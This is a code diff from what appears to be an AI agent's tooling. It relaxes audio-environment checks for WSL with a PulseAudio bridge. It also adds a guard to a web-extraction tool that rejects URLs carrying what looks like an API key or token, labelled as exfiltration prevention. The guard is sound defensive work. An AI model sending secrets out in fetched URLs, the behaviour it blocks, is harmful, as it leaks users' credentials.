@ -51,9 +51,12 @@ def _audio_available() -> bool:
def detect_audio_environment() -> dict:
"""Detect if the current environment supports audio I/O.
Returns dict with 'available' (bool) and 'warnings' (list of strings).
Returns dict with 'available' (bool), 'warnings' (list of hard-fail
reasons that block voice mode), and 'notices' (list of informational
messages that do NOT block voice mode).
"""
warnings = []
warnings = [] # hard-fail: these block voice mode
notices = [] # informational: logged but don't block
# SSH detection
if any(os.environ.get(v) for v in ('SSH_CLIENT', 'SSH_TTY', 'SSH_CONNECTION')):
@ -63,11 +66,20 @@ def detect_audio_environment() -> dict:
if os.path.exists('/.dockerenv'):
warnings.append("Running inside Docker container -- no audio devices")
# WSL detection
# WSL detection — PulseAudio bridge makes audio work in WSL.
# Only block if PULSE_SERVER is not configured.
try:
with open('/proc/version', 'r') as f:
if 'microsoft' in f.read().lower():
warnings.append("Running in WSL -- audio requires PulseAudio bridge to Windows")
if os.environ.get('PULSE_SERVER'):
notices.append("Running in WSL with PulseAudio bridge")
else:
warnings.append(
"Running in WSL -- audio requires PulseAudio bridge.\n"
" 1. Set PULSE_SERVER=unix:/mnt/wslg/PulseServer\n"
" 2. Create ~/.asoundrc pointing ALSA at PulseAudio\n"
" 3. Verify with: arecord -d 3 /tmp/test.wav && aplay /tmp/test.wav"
)
except (FileNotFoundError, PermissionError, OSError):
pass
@ -79,7 +91,12 @@ def detect_audio_environment() -> dict:
if not devices:
warnings.append("No audio input/output devices detected")
except Exception:
warnings.append("Audio subsystem error (PortAudio cannot query devices)")
# In WSL with PulseAudio, device queries can fail even though
# recording/playback works fine. Don't block if PULSE_SERVER is set.
if os.environ.get('PULSE_SERVER'):
notices.append("Audio device query failed but PULSE_SERVER is set -- continuing")
else:
warnings.append("Audio subsystem error (PortAudio cannot query devices)")
except ImportError:
warnings.append("Audio libraries not installed (pip install sounddevice numpy)")
except OSError:
@ -93,6 +110,7 @@ def detect_audio_environment() -> dict:
return {
"available": len(warnings) == 0,
"warnings": warnings,
"notices": notices,
}
# ---------------------------------------------------------------------------
@ -748,6 +766,8 @@ def check_voice_requirements() -> Dict[str, Any]:
for warning in env_check["warnings"]:
details_parts.append(f"Environment: {warning}")
for notice in env_check.get("notices", []):
details_parts.append(f"Environment: {notice}")
return {
"available": available,

View file

@ -1130,24 +1130,26 @@ def web_search_tool(query: str, limit: int = 5) -> str:
async def web_extract_tool(
urls: List[str],
format: str = None,
urls: List[str],
format: str = None,
use_llm_processing: bool = True,
model: Optional[str] = None,
min_length: int = DEFAULT_MIN_LENGTH_FOR_SUMMARIZATION
) -> str:
"""
Extract content from specific web pages using available extraction API backend.
This function provides a generic interface for web content extraction that
can work with multiple backends. Currently uses Firecrawl.
Args:
urls (List[str]): List of URLs to extract content from
format (str): Desired output format ("markdown" or "html", optional)
use_llm_processing (bool): Whether to process content with LLM for summarization (default: True)
model (Optional[str]): The model to use for LLM processing (defaults to current auxiliary backend model)
min_length (int): Minimum content length to trigger LLM processing (default: 5000)
Security: URLs are checked for embedded secrets before fetching.
Returns:
str: JSON string containing extracted content. If LLM processing is enabled and successful,
@ -1156,6 +1158,16 @@ async def web_extract_tool(
Raises:
Exception: If extraction fails or API key is not set
"""
# Block URLs containing embedded secrets (exfiltration prevention)
from agent.redact import _PREFIX_RE
for _url in urls:
if _PREFIX_RE.search(_url):
return json.dumps({
"success": False,
"error": "Blocked: URL contains what appears to be an API key or token. "
"Secrets must not be sent in URLs.",
})
debug_call_data = {
"parameters": {
"urls": urls,